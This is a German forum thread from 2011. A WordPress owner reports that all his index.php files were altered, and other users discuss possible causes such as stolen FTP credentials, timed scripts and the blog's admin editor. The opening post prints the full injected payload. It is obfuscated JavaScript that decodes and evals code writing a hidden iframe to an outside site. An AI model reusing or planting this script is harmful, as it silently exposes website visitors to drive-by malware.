Angriffe auf index.php Seiten

  • Hallo, ich habe mit meinem Wordpress folgendes Problem: Aus unerfindlichen Gründen werden ALLE (!!!) index.php Dateien auf meinem Webspace modifiziert. Dies ist jetzt schon zum zweiten mal passiert, und steht in keinem Zusammenhang mit Updates / Änderungen am Webserver / CMS ...

    Folgender Code wird immer eingefügt:

    PHP
    <html><body><script>String.prototype.test="harC";for(i in $='')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('a'+'s'))throw 1;}catch(q){h=d2-d;} 
    n=[7-h,7-h,103-h,100-h,30-h,38-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,39-h,121-h,7-h,7-h,7-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,57-h,7-h,7-h,123-h,30-h,99-h,106-h,113-h,99-h,30-h,121-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,117-h,112-h,103-h,114-h,99-h,38-h,32-h,58-h,103-h,100-h,112-h,95-h,107-h,99-h,30-h,113-h,112-h,97-h,59-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,114-h,109-h,110-h,113-h,43-h,107-h,95-h,103-h,106-h,113-h,44-h,97-h,109-h,107-h,45-h,103-h,108-h,98-h,99-h,118-h,44-h,102-h,114-h,107-h,106-h,37-h,30-h,117-h,103-h,98-h,114-h,102-h,59-h,37-h,47-h,46-h,37-h,30-h,102-h,99-h,103-h,101-h,102-h,114-h,59-h,37-h,47-h,46-h,37-h,30-h,113-h,114-h,119-h,106-h,99-h,59-h,37-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,56-h,102-h,103-h,98-h,98-h,99-h,108-h,57-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,56-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,57-h,106-h,99-h,100-h,114-h,56-h,46-h,57-h,114-h,109-h,110-h,56-h,46-h,57-h,37-h,60-h,58-h,45-h,103-h,100-h,112-h,95-h,107-h,99-h,60-h,32-h,39-h,57-h,7-h,7-h,123-h,7-h,7-h,100-h,115-h,108-h,97-h,114-h,103-h,109-h,108-h,30-h,103-h,100-h,112-h,95-h,107-h,99-h,112-h,38-h,39-h,121-h,7-h,7-h,7-h,116-h,95-h,112-h,30-h,100-h,30-h,59-h,30-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,97-h,112-h,99-h,95-h,114-h,99-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,38-h,37-h,103-h,100-h,112-h,95-h,107-h,99-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,113-h,112-h,97-h,37-h,42-h,37-h,102-h,114-h,114-h,110-h,56-h,45-h,45-h,114-h,109-h,110-h,113-h,43-h,107-h,95-h,103-h,106-h,113-h,44-h,97-h,109-h,107-h,45-h,103-h,108-h,98-h,99-h,118-h,44-h,102-h,114-h,107-h,106-h,37-h,39-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,116-h,103-h,113-h,103-h,96-h,103-h,106-h,103-h,114-h,119-h,59-h,37-h,102-h,103-h,98-h,98-h,99-h,108-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,110-h,109-h,113-h,103-h,114-h,103-h,109-h,108-h,59-h,37-h,95-h,96-h,113-h,109-h,106-h,115-h,114-h,99-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,106-h,99-h,100-h,114-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,114-h,119-h,106-h,99-h,44-h,114-h,109-h,110-h,59-h,37-h,46-h,37-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,117-h,103-h,98-h,114-h,102-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,100-h,44-h,113-h,99-h,114-h,63-h,114-h,114-h,112-h,103-h,96-h,115-h,114-h,99-h,38-h,37-h,102-h,99-h,103-h,101-h,102-h,114-h,37-h,42-h,37-h,47-h,46-h,37-h,39-h,57-h,7-h,7-h,7-h,98-h,109-h,97-h,115-h,107-h,99-h,108-h,114-h,44-h,101-h,99-h,114-h,67-h,106-h,99-h,107-h,99-h,108-h,114-h,113-h,64-h,119-h,82-h,95-h,101-h,76-h,95-h,107-h,99-h,38-h,37-h,96-h,109-h,98-h,119-h,37-h,39-h,89-h,46-h,91-h,44-h,95-h,110-h,110-h,99-h,108-h,98-h,65-h,102-h,103-h,106-h,98-h,38-h,100-h,39-h,57-h,7-h,7-h,123-h];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);</script></body></html>

    Dabei variieren im Mittelteil die Zahlen.

    Kann mir IRGENDWER Informationen zu diesem Problem geben? Ich habe schon alle Passwörter (MySQL, FTP...) geändert.

    MfG Pascal

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren


  • Kann mir IRGENDWER Informationen zu diesem Problem geben? Ich habe schon alle Passwörter (MySQL, FTP...) geändert.

    und die Sicherheitslücke geschlossen und alle fremden Scripte gelöscht?

    cu

    ralf

    Mit offenen Augen träumen

  • und auch Deinen Rechner mal überprüft? Manche Viren schleusen sich über den heimischen Rechner ein indem sie dort die FTP Passwörter auslesen die in Deinem FTP Programm gespeichert sind. Da nütz dann alles ändern der Passwörter nichts, wenn man sie dem Teil so gleich wieder gibt.

  • also ich nutze AUSSCHLIESSLICH ubuntu / linux... - damit dürfte sich die idee mit dem virus erledigt haben, oder?

    aber mal ernsthaft, kann mir jemand etwas zu diesen code sagen?

    die fremdscripts sind raus.

    Ralf welche sicherheitslücke meinst du?

  • ok, ich glaube, wir reden aneinander vorbei.

    1. ich war zum zeitpunkt der dateiveränderung (24.08.2011 gegen 23:30, ab da gabs keine nutzer mehr...) im tiefschlaf --> keiner meiner rechner an.
    2. daraus lässt sich schließen, das der angriff NICHT von meinem PC aus ausgeführt wurde.

    was ich aber IMMERNOCH wissen will ist, um was für einen code es sich handelt (siche oben!) - was macht der (ausser den content ausblenden)
    und
    hatte schon mal jmd ähnliche probleme?

    und:

    Die - mit der man auf deinem Sytem bestehende PHP-Scripte verändern darf.

    wenns nicht genauer geht kann ich auf deine hilfe verzichten. das es ein sicherheitsleck gibt war mir schon klar.

    Achso: Ich ahbe mal gegooglet. es gibt noch mehr seiten, die diesen code schnipsel im quelltext haben... einige davon sind von google mit einer warnung versehen wurden von wegen " diese seite könnte ihren pc infizieren" -

    Meine Website mit Technews, Tipps und Tricks: http://go-seven.de

    Einmal editiert, zuletzt von go-seven (28. August 2011 um 16:41)


  • 1. ich war zum zeitpunkt der dateiveränderung (24.08.2011 gegen 23:30, ab da gabs keine nutzer mehr...) im tiefschlaf --> keiner meiner rechner an.
    2. daraus lässt sich schließen, das der angriff NICHT von meinem PC aus ausgeführt wurde.


    wenns nicht genauer geht kann ich auf deine hilfe verzichten.

    o.k ;)

    lol

    ralf

    ps: das JavaScript wurde bereits für den TE decodiert in einem anderen Forum

    Mit offenen Augen träumen

  • 2. daraus lässt sich schließen, das der angriff NICHT von meinem PC aus ausgeführt wurde. --> keiner meiner rechner an.

    ach so! Ubuntu Linux ist übrigens keine Garantie, gegenüber Viren. Das finde ich immer süss! - "Ich habe Linux, mir kann nichts passieren." Errare humanum est :-)
    Und warum muss Dein Rechner an sein, wenn ich ja bereits Deine Passwörter ausspioniert habe... ?

    Wenn Du weiterhin so 'flexibel' auftrittst, muss Du hier auch keine Hilfe erwarten.

  • Zitat

    1. ich war zum zeitpunkt der dateiveränderung (24.08.2011 gegen 23:30, ab da gabs keine nutzer mehr...) im tiefschlaf --> keiner meiner rechner an.
    2. daraus lässt sich schließen, das der angriff NICHT von meinem PC aus ausgeführt wurde.

    Diese Aussage ist nicht korrekt
    Wenn A) wie B-52 bereits bemerkte, die Passwörter klar gemacht wurden ist es schnurz, ob die Kiste läuft
    B) via PC ein Script installiert wurde, das zeitgesteuert agiert
    C) Du lediglich die Einträge in der index.php gelöscht hast, aber nicht die Ursache, bringt der ganze Heckmeck mit ändern der Zugangspasswörter nichts

    --> überprüfe den Server, ob dort z.B. htaccess Dateien erscheinen, die alle das gleiche änderungsdatum haben und in etwa die gleiche Zeit/gleiche Größe

    Zitat

    wenns nicht genauer geht kann ich auf deine hilfe verzichten. das es ein sicherheitsleck gibt war mir schon klar.

    löse Dich mal von der Idee, dass Du es eh besser weisst. Wenn es so wäre, müsstest Du hier nicht fragen, oder? Und nie vergessen: DU brauchst Hilfe, da solltest Du nicht Helfende anfurzen, wenn Dir die Vorschläge zu banal vorkommen.

    Einmal editiert, zuletzt von gericoach (29. August 2011 um 13:16)

  • ich habe nocheinmal alle daten aus meinem webspace (ich habe keinen eigenen server) analysiert. an dem tag, wurden wirklich nur die index.php dateiEN (unterverzeichnisse...) editiert.

    ich habe auch nochmal alles nach htacces datein und scripts abgesucht - nichts...

  • ich habe nocheinmal alle daten aus meinem webspace (ich habe keinen eigenen server) analysiert. an dem tag, wurden wirklich nur die index.php dateiEN (unterverzeichnisse...) editiert.

    ich habe auch nochmal alles nach htacces datein und scripts abgesucht - nichts...

    die sind in deinem admin-bereich des blogs gewesen, dort kann man auch die index.php und einige andere editieren.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!